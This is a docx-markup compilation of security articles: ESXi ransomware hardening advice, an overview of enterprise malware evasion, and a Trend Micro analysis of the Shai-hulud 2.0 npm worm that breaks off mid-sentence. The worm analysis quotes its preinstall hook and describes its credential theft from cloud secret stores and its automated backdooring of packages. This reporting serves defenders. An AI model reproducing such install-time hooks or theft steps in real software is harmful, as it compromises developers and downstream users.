        <w:t>We've seen misuse of Hyper-V management utilities, to modify VM settings and undermine security features. This includes disabling endpoint defenses, tampering with virtual switches, and preparing VMs for ransomware deployment at scale.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shift underscores a growing and uncomfortable trend: Attackers are targeting the infrastructure that controls all hosts, and with access to the hypervisor, adversaries dramatically amplify the impact of their intrusion.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 the Gift of Security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Hackers love the holidays too! Share FREE Security Awareness Training with family &amp; friends to keep them safe.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Quick, fun lessons to sharpen their cyber-smarts! Access extended through 1/31/26. Sign Up For Free Secure access, enforce least privilege, and separate the management plane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If an attacker can obtain administrative credentials for the hypervisor, they can deploy ransomware payloads that affect every VM on the host. Also, using domain-joined accounts (e.g., Active Directory (AD) accounts) for ESXi increases lateral movement risk.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to do: Use local ESXi accounts. Avoid using general-purpose domain admin accounts for management. Instead, create dedicated, local ESXi accounts or strictly limited, audited domain accounts with only the necessary permissions. If a domain admin account is compromised, this separation prevents immediate, unauthorized access to the hypervisor and its virtual machines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce Multi-factor Authentication (MFA). This is non-negotiable for all critical infrastructure. Enforce MFA for host management interfaces and vCenter access to protect against credential theft. An attacker with a stolen username and password will be blocked, significantly raising the effort required for a successful breach. This control provides a robust defense against common phishing and brute-force attacks.Use strong passwords stored in a secure password vault. ESXi credentials should be extremely strong and stored only in a dedicated password vault, never in shared documents or less secure locations. This prevents credential exposure through common attack vectors like compromised file shares or insecure password management practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segregate the host management network. Segregate the hypervisor's management network from production and general user networks. Create a dedicated VLAN or network segment that is logically and/or physically separate. By limiting the number of endpoints that can even attempt to connect to the hypervisor management interface, you drastically reduce the potential attack surface.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy a jump box or bastion server. To ensure all administrative access is audited and controlled, deploy a jump box or bastion server that IT admins must access first, before pivoting to the hypervisor. This setup eliminates direct connections from potentially less-secure administrator workstations. The jump box acts as a monitored checkpoint, allowing for session recording, logging of all commands, and enforcement of security policies before granting access to critical infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply the principle of least privilege(PoLP). Strictly limit access to the control plane (vCenter and individual hosts). Grant only the minimum required roles for necessary administrative functions, such as resource management or patching, to both human administrators and service accounts. Enforcing PoLP ensures that a potential compromise of a single account cannot be leveraged for wholesale changes across the entire virtualized environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict management access to dedicated admin devices. Limit ESXi management interface access to specific administrative devices with static IP addresses. This creates an additional barrier by ensuring that only known, authorized endpoints can attempt to connect to the hypervisor, further reducing the attack surface. Lock down the hypervisor runtime environment and enforce code-/execution controls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One of the unique risks with hypervisor-level ransomware is that once the attacker is on the host, they can run code at the hypervisor level, bypassing guest-OS controls. You need to harden the host so it only runs expected, signed code and trusted modules.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to do: Enable the advanced host setting VMkernel.Boot.execInstalledOnly = TRUE so that only binaries installed via signed VIBs can execute, which prevents custom, malicious binaries from running on the host.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable/close unnecessary services such as SSH or ESXi Shell when not in use; enable lockdown mode. Keep the hypervisor patched, up to date, and exposed surfaces minimised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Attackers are actively targeting ESXi hosts via known vulnerabilities for mass encryption operations. 0days and CVEs are not going to likely be the most common / real reason for compromise, and likely to be lapses in security segmentation. However, maintaining patching is critical.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example, CVE-2024-37085 highlights this hypervisor risk perfectly. This vulnerability allows attackers with adequate AD permissions to bypass authentication and instantly seize full administrative control of an ESXi host, leading to mass encryption of all VMs in seconds.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exploit works because vulnerable ESXi hosts automatically grant full admin privileges to the 'ESX Admins' AD group. Threat actors simply recreate that group to immediately seize the keys to the kingdom.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These initial compromises often start with unpatched management interfaces or exposed protocols, like Service Location Protocol (SLP), which provide a low-effort entry point.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to do: Maintain an inventory of all ESXi hosts (and associated management components like vCenter) and their patch level.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prioritize security patches and updates from the vendor, especially for hypervisor-related CVEs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable or restrict services you don't need or ensure they are not exposed externally. Service Location Protocol (SLP/port 427) has been exploited by ransomware groups like ESXArgs and should be disabled. Follow VMware's official remediation guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure that ESXi hosts are not directly exposed to the internet for management. Use VPNs, bastion hosts, or isolated management networks. Backup strategy, immutable snapshots and rapid recovery capability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Even with strong prevention, risk remains. The hypervisor layer is high- impact; fallback is mandatory. Many guides emphasise that recovery is the last line of defense. Ransomware targeting ESXi typically seeks to encrypt VMDKs and host files; without good backups you may be forced to pay.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to do: Adopt the "3-2-1" backup rule: have at least three copies of data, on two different media, and one copy offsite/off the hypervisor network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use immutable backup repositories or snapshots so that once written they cannot be modified or deleted by ransomware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Do not connect your backup repository to Active Directory or any centralized identity management system. Instead, use separate, non-domain- joined, and dedicated local accounts to prevent a compromised AD credential from enabling ransomware to spread directly to your critical backup location.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure backups include full VM images and associated hypervisor state, so you can rebuild quickly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your backups regularly. Don't just confirm that you can mount a backup and access files, but ensure that your OS fully starts and that you can login with known credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Practice full recovery drills on an annual basis at a minimum. Assumptions lead to longer periods of downtime. Here are some additional considerations: Have you tested in your offsite and/or failover locations?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Can you confirm that your servers have the correct networking/connectivity? Can you access these failover servers from production endpoints?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Does the backup site/failover location's firewall already have the required allowlisting and firewall rules to ensure proper communication from critical tooling, such as EDR, RMM, and VPN clients? Monitor, detect anomalies, and assume breach (defense-in-depth)</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Because the hypervisor layer is often less visible to traditional endpoint security tools like EDR, you need an alternative detection strategy. Attackers often perform actions like changing the VIB acceptance level, enabling SSH, disabling lockdown mode, or creating new admin accounts, as precursors to ransomware payload deployment.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Without monitoring, you may only detect the event after the encryption is complete.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to do: Forward ESXi logs to your SIEM and create alerts for key suspicious events (like new root login, service enablement, VIB acceptance change, datastore unmounts).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor configurations for drift. If any host has lockdown mode disabled, SSH enabled, or execInstalledOnly turned off, flag it for review.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log management network traffic. Remember earlier when we recommended putting ESXi and other critical infrastructure control panes on their own VLAN or network segment? Now it's time to look for unusual source IPs accessing the hypervisor management interface (ideally you are only allowing traffic from your jump server), lateral movement attempts, or large datastore IO patterns consistent with VM encryption.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use a zero-trust mindset for hypervisor management, and assume credentials may be compromised, and build alerts accordingly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unlike traditional syslog formats, ESXi separates logs by specific activities into distinct files. The following are the most critical log files for detecting and investigating hypervisor compromises: /var/log/auth.log (authentication events), /var/log/hostd.log (host agent activity), /var/log/shell.log (ESXi shell commands), and /var/log/vobd.log (VMware observer daemon). For log configuration guidance, see Broadcom's documentation and Sygnia's ESXi defense strategies.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When partnering with a third-party SOC or MDR provider, consider establishing a shared responsibility model. Your external security partner won't have the necessary business context to distinguish routine internal maintenance from an adversary breaking in at 2 AM.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distinction is critical: the third-party SOC is best positioned to detect universal evil, like the execution of ransomware itself. To augment this, we recommend that your internal security team focus on monitoring for insider threats and actions that only they can contextualize, such as a late-night login followed by the enabling of SSH.</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this model to succeed, IT teams must strictly adhere to change control procedures and communicate all expected hypervisor changes to internal security. This ensures the SOC is aware of all anticipated activity, enabling all parties to focus their efforts where they are most effective. Conclusion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Protecting bare-metal hypervisors like ESXi from ransomware requires a layered, proactive approach. From patching and access control, through runtime hardening and recovery readiness, to detection and logging, you need to cover all angles.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If you need more comprehensive guidance on preparing for the worst, review our guide to Disaster Recovery Planning. Now is the time for your organization to ask: when was the last time we fully updated and tested our IRPs and DRPs, specifically confirming the ability to restore and run all guest virtual machines?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Despite our best prevention and detection efforts, organizations should also prepare for the possibility of a successful compromise. If you find yourself responding to an ESXi environment compromised, we recommend reviewing this comprehensive ESXi IR Guide. The guide provides detailed incident response procedures and forensic artifacts, specifically tailored for ESXi environments.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Leveraging Huntress, you may already apply many of these at the OS/endpoint layer; but the hypervisor demands the same rigor (and often more) because of its potential for mass impact.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If you embed this article's defense guidance into your environment and security processes, you significantly raise the barrier for ransomware actors. Maintain Situational Awareness in 2026-Register for Tradecraft Tuesday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Tradecraft Tuesday provides cybersecurity professionals with an in-depth analysis of the latest threat actors, attack vectors, and mitigation strategies. Each weekly session features technical walkthroughs of recent incidents, comprehensive breakdowns of malware trends, and up-to-date indicators of compromise (IOCs).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Participants gain: Detailed briefings on emerging threat campaigns and ransomware variants Evidence-driven defense methodologies and remediation techniques Direct interaction with Huntress analysts for incident response insights Access to actionable threat intelligence and detection guidance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Register for Tradecraft Tuesday →</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Advance your defensive posture with real-time intelligence and technical education specifically designed for those responsible for safeguarding their organization's environment.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and written by Huntress Labs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.12.16 19:06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/the-hidden-risk-in-virtualization-why-hypervisors-are-a-ransomware-magnet/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Enterprise Malware Breaches: How Advanced Threats Are Bypassing Security Systems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 hours ago</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Anonymous Hackers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Enterprise Malware Breaches: How Advanced Threats Are Bypassing Security Systems. Enterprise cybersecurity has never been more sophisticated-or more vulnerable. Despite heavy investments in next-generation firewalls, endpoint detection tools, and cloud security platforms, enterprise malware breaches continue to rise globally. In 2025, attackers are no longer relying on noisy exploits or basic phishing tactics. Instead, they use advanced, stealthy, and multi-stage malware campaigns designed specifically to bypass modern security systems.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From fileless malware and zero-day exploits to identity-based attacks and AI-driven evasion, today's threats are built to blend into legitimate enterprise activity. The result is a growing number of breaches that go undetected for weeks or even months-until data is stolen, systems are encrypted, or operations are disrupted.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article explores how advanced malware is bypassing enterprise security systems, the techniques attackers use, the real-world impact, and what organisations must do to defend themselves. Enterprise Malware Breaches: How Advanced Threats Are Bypassing Security Systems The New Reality of Enterprise Malware Breaches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Traditional malware attacks focused on exploiting software vulnerabilities or tricking users into downloading malicious files. Modern enterprise breaches, however, follow a far more strategic approach. Key Characteristics of Modern Enterprise Malware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Low noise and high stealth</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Multi-stage attack chains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Identity-centric targeting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Abuse of trusted tools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Long dwell time before activation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Attackers are no longer trying to break in-they are logging in, blending in, and staying hidden. Why Traditional Enterprise Security Is Failing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Despite layered defences, many organisations still rely on outdated security assumptions. Common Gaps in Enterprise Security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Overreliance on signature-based detection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Excessive trust in internal networks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Poor visibility into identity behaviour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Inconsistent patch management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Misconfigured cloud and SaaS environments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Advanced malware is designed to exploit these exact weaknesses. How Advanced Malware Is Bypassing Enterprise Security Systems 1. Fileless Malware Attacks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Fileless malware does not rely on traditional executable files. Instead, it operates entirely in memory using legitimate system tools. Why Fileless Malware Works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 files for antivirus to scan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Uses trusted processes like PowerShell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Leaves minimal forensic evidence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Often invisible to legacy EDR tools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These attacks allow malware to run without ever touching the disk, making detection extremely difficult. 2. Living-Off-the-Land (LotL) Techniques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Advanced attackers increasingly abuse legitimate enterprise tools already installed on systems. Commonly Abused Tools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PowerShell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Windows Management Instrumentation (WMI)</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Remote Desktop Protocol (RDP)</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Command-line utilities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Cloud admin APIs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Because these tools are trusted and widely used by IT teams, malicious activity often appears normal. 3. Identity-Based Malware Attacks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Rather than attacking devices directly, modern malware targets identities. How Identity Attacks Work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Steal credentials using infostealers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Capture session cookies and tokens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Abuse Single Sign-On (SSO)</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Bypass MFA using token replay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Once attackers control an identity, they can move freely across systems without triggering alarms. 4. Zero-Day Exploits and Unknown Vulnerabilities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Zero-day vulnerabilities remain one of the most effective methods for bypassing enterprise defenses. Why Zero-Days Are Dangerous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 patches available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 known signatures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Often exploited silently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Used selectively to avoid detection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Attackers frequently reserve zero-days for high-value enterprise targets. 5. Malware Delivered via Trusted Supply Chains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Supply chain attacks allow malware to enter enterprises through trusted vendors or software updates. Common Supply-Chain Entry Points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Third-party software updates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Managed service providers (MSPs)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Cloud integrations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Development libraries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Once inside, malware inherits trust from legitimate software. 6. AI-Driven Evasion Techniques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Cybercriminals are now using artificial intelligence to evade enterprise security controls. AI-Powered Malware Capabilities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Adaptive behaviour based on the environment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Timing attacks to avoid detection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Polymorphic payloads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Human-like activity simulation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makes malware harder to distinguish from legitimate users. 7. Delayed Execution and Dormancy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Advanced malware often remains dormant after initial access. Why Attackers Delay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Avoid triggering alerts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Study network behaviour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Identify high-value systems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Wait for optimal timing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extended dwell time allows attackers to plan devastating final attacks, such as ransomware deployment. 8. Abuse of Cloud and SaaS Platforms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 enterprises move to cloud-first models, attackers follow. Cloud-Focused Malware Techniques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Compromising API keys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Abusing OAuth permissions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Injecting malicious workloads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Exploiting misconfigured storage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Traditional perimeter defences offer little protection in these environments. The Enterprise Malware Kill Chain Explained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Most advanced breaches follow a predictable pattern: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Initial access (phishing, stolen credentials, exploit)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Persistence establishment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Privilege escalation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Lateral movement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Data discovery and exfiltration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Payload execution (ransomware, espionage, sabotage)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Stopping the attack early is critical-but requires visibility beyond endpoints. Real-World Impact of Enterprise Malware Breaches Operational Disruption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System outages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process failures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Manufacturing or service downtime Financial Loss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Ransom payments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Recovery costs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Legal and regulatory penalties Reputational Damage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Loss of customer trust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Stock price impact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Long-term brand harm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Enterprise malware breaches are no longer just IT problems-they are business-level crises. Why Detection Often Happens Too Late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Many organisations discover breaches only after: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Ransomware encryption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Data leaks on the dark web</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Law enforcement notification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Customer complaints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delay is caused by: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Alert fatigue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Incomplete telemetry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Poor correlation between tools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Lack of threat-hunting capabilities How Enterprises Can Defend Against Advanced Malware 1. Shift from Prevention to Detection and Response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Assume breaches will happen and focus on rapid detection and containment. 2. Implement Zero Trust Architecture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Verify every access request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Limit lateral movement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Continuously validate identity and device health 3. Strengthen Identity Security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Enforce strong MFA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Monitor anomalous logins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Protect session tokens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Rotate credentials regularly 4. Use Behaviour-Based Threat Detection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Look for abnormal patterns-not known malware signatures. 5. Secure Cloud and SaaS Environments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Audit permissions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Monitor API usage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Detect suspicious OAuth grants 6. Perform Proactive Threat Hunting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Actively search for signs of compromise rather than waiting for alerts. 7. Maintain Immutable and Offline Backups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Backups remain the last defence against ransomware-based breaches. The Role of Employees in Enterprise Security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Even the most advanced malware often starts with human error. Employee- Focused Defences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Regular phishing simulations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Security awareness training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Clear incident reporting procedures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Security culture is as important as security technology. The Future of Enterprise Malware Threats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Looking ahead, enterprise malware will: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Focus more on identity than endpoints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Exploit cloud-native weaknesses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Use AI for faster decision-making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Combine espionage and extortion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Become more automated and scalable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Organisations must adapt or fall behind. Final Thoughts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Enterprise malware breaches are no longer the result of simple security failures. They are the outcome of highly sophisticated, stealth-driven attacks designed to bypass modern defences.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Advanced threats succeed not because enterprises lack tools-but because attackers understand how those tools work and how to evade them. In 2025, security is not about building higher walls. It is about visibility, identity protection, rapid response, and continuous adaptation.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organizations that survive future breaches will not be the ones with the most tools-but the ones with the clearest understanding of how advanced malware really operates.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Views: 66</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Anonymous Hackers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Anonymous Hackers 2025.12.14 13:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.anonymoushackers.net/malware-news/enterprise-malware-breaches-how-advanced-threats-are-bypassing-security-systems/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Shai-hulud 2.0 Campaign Targets Cloud and Developer Ecosystems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Shai-hulud 2.0 campaign features a sophisticated variant capable of stealing credentials and secrets from major cloud platforms and developer services, while automating the backdooring of NPM packages maintained by victims. Its advanced tactics enable rapid, stealthy propagation across the software supply chain, putting countless downstream users at risk.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Jeffrey Francis Bonaobra Nov 27, 2025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Key takeaways: Shai-hulud 2.0 continues the first variant's credential theft by stealing credentials and secrets from major cloud platforms as well as NPM tokens and GitHub authentication credentials, but introduces backdoor capabilities. The malware automates supply chain compromise by backdooring all NPM packages maintained by the victim, republishing them with malicious payloads that execute on installation, creating a highly wormable threat with the potential to impact thousands of downstream users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The malware uses stolen cloud credentials to access cloud-native secret management services, while also exhibiting destructive code that wipes user data when unsuccessful in harvesting data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM detects and blocks the indicators of compromise (IOCs) outlined in this blog, and provides customers with tailored threat hunting queries, threat insights, and intelligence reports.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blog continues our investigation on the Node Package Manager (NPM) supply chain attack that took place on September 15, where attackers executed a highly targeted phishing campaign to compromise the account of an NPM package maintainer. Our previous blog detailed how the malicious code injected onto JavaScript packages diverted cryptocurrency assets by hijacking web APIs and manipulating network traffic, and how the Shai-hulud worm in the attack payload steals cloud service tokens, deploys secret- scanning tools, and spreads to additional accounts. An incident this November 24 reported hundreds of NPM repositories compromised by what appears to be a new Shai-hulud campaign with the repository description, "Sha1-Hulud: The Second Coming."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blog discusses TrendTM Research findings on Shai-hulud 2.0 and reveals new functions that weren't observed in its first variant.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Our analysis of Shai-hulud 2.0 reveals that it can steal credentials from AWS, GCP, and Azure cloud providers, which can contain API keys, tokens, and passwords, along with NPM tokens and GitHub authentication credentials. The malware also creates GitHub Actions workflows that allow for command- and-control (C&amp;C). It also injects GitHub Actions workflow mechanisms that are specifically designed to steal repository secrets.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Beyond stealing static credentials, the malware uses stolen cloud credentials to access cloud-native secret management services: it can retrieve secrets from AWS using the AWS Secrets Manager API, extracts Google Cloud secrets through the GCP Secret Manager API, and collects Azure secrets via Azure Key Vault. The malware also targets credentials from Azure Pod Identity, a legacy system that remains widely used for providing Azure identities to Kubernetes pods.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 top all the capabilities, the malware also automatically backdoors every NPM package maintained by the victim, republishing them with malicious payloads that run during package installation, creating a wormable vector capable of spreading exponentially across the NPM ecosystem and potentially compromising thousands of downstream users who trust the affected packages. This entire workflow is automated and parallelized across up to 100 packages at once, maximizing propagation while keeping detection opportunities minimal.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Shai-hulud 2.0 attack chain analysis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Shai-Hulud 2.0 is delivered as an NPM package with a malicious preinstall script that executes automatically during the NPM installation process (modified package.json with "preinstall": "node setup_bun.js").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 Shai-hulud 2.0 high-Level workflow</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setup_bun.js (Loader)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initial dropper setup_bun.js script serves as a loader that executes during the NPM package installation process. Its primary purpose is to ensure that a Bun JavaScript runtime is available on the victim's system and then uses it to execute the main malware payload (bun_environment.js).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Figure 2. setup_bun.js execution flow</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Bun runtime detection and installation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initial phase of the setup script involves detecting whether a Bun JavaScript runtime is already installed on the victim's system. This detection process uses platform-specific commands to search the system PATH for the Bun executable. On Windows systems, the script executes the where command, while Unix-like systems (Linux and macOS) use the which command.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If Bun is not detected in the system PATH, the script initiates an automatic download and installation process. This process uses official Bun installation scripts provided by bun.sh, which adds legitimacy to the installation and reduces the likelihood of detection by security software.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 Windows, the script uses PowerShell to download and execute the installation script via the Invoke-RestMethod and Invoke-Expression cmdlets. On Unix-like systems, it uses curl to download the installation script and pipes it directly to bash for execution. This approach mirrors the official Bun installation instructions, making the malware's behavior appear legitimate.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3. Checks if Bun is available on system PATH before attempting installation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Reloading PATH environment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installing the Bun runtime, the setup script must reload the system PATH environment variable to detect the newly installed executable. This is necessary because the Bun installation process modifies the user's PATH, but these changes are not immediately visible to the already-running Node.js process executing the setup script. The PATH reloading mechanism uses platform-specific techniques to retrieve the updated environment configuration.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 Windows systems, the script queries the Windows Registry using PowerShell to retrieve both user-level and machine-level PATH variables, then combines them into a single PATH string. This approach ensures that the Bun installation is detected regardless of whether it was installed to the user's profile directory or a system-wide location. The script uses the [Environment]::GetEnvironmentVariable() .NET method accessed through PowerShell to read these registry values.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4. Powershell execution to query updated PATH from registry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 Unix-like systems, the PATH reloading process is more complex due to the variety of shell configurations that might be in use. The script attempts to source common shell profile files including .bashrc, .bash_profile, .profile, and .zshrc in the user's home directory.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5. Powershell execution to query updated PATH from registry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Payload execution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final phase of the setup script orchestrates the execution of the actual malware payload.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script first checks if Bun is available in the system PATH which would be the case if Bun was previously installed or just successfully installed in an earlier step. If not found in PATH, the script searches for a locally bundled Bun executable that might have been included with the malicious package. The local Bun search examines several possible file paths within a bun-dist directory that could be bundled with the package. This includes checking for both Unix-style executable names (bun) and Windows executable names (bun.exe) in various subdirectory structures.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6. Checking if Bun is available in the system PATH</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Once a Bun executable is located or installed, the script proceeds to execute the main malware payload stored in bun_environment.js. The script spawns the Bun process with the payload file as an argument.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7. Execution of the main payload bun_environment.js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bun_environment.js (main payload)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jy1() function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jy1() function is the main entry point of the Shai-hulud 2.0 malware payload. When bun.exe bun_environment.js executes, this function is invoked at the script's top level and orchestrates the entire attack sequence.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CI/CD environment checking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malware checks for CI/CD environment variables to determine if it's running in a continuous integration pipeline or on a developer's local machine. When detected, the malware executes immediately without background spawning to maximize credential access during build pipelines.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8. Checking of CI/CD environments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BUILDKITE - Buildkite CI/CD platform PROJECT_ID - Google Cloud Build GITHUB_ACTIONS - GitHub Actions workflows CODEBUILD_BUILD_NUMBER - AWS CodeBuild CIRCLE_SHA1 - CircleCI pipelines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If none of these variables exist in process.env, it concludes the environment is a regular developer machine rather than a CI/CD pipeline, which triggers the stealth execution path with background process spawning.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Developer machine execution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malware uses a stealth approach on developer machines by spawning a detached background process using Bun.spawn().unref() with the POSTINSTALL_BG=1 environment variable flag, which allows the parent process to exit immediately so NPM install completes in normal timing (2-3 seconds, avoiding user 